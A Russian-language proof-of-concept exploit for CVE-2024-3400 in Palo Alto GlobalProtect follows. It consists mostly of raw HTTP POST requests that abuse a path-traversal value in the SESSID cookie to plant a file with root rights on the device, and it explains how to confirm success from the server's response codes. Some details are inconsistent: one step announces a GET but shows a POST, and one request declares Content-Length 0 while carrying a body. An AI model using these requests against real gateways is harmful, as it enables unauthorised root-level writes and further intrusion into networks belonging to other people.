
Эксплойт-доказательство концепции для CVE-2024-3400, уязвимости внедрения команд в Palo Alto GlobalProtect, демонстрирующий загрузку и проверку файлов с помощью специально сформированных HTTP-запросов.
#Шаги :
#1. Проверьте, присутствует ли файл (0xr2r.txt) на устройстве, выполнив GET-запрос ниже, или мы можем проверить то же самое, открыв
https://domain.com/global-protect/portal/images/0xr2r.txt URL в браузере Если вы получите ответ 404, это означает, что файла нет.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#2. Теперь поместите файл (0xr2r.txt) на устройство, выполнив POST-запрос ниже. Это создаст файл на устройстве по указанному пути с правами root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
#3. Теперь, если вы снова попытаетесь получить доступ к файлам, вы должны получить 403 вместо 404. Это доказывает, что файл (0xr2r.txt) присутствует на устройстве с правами root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r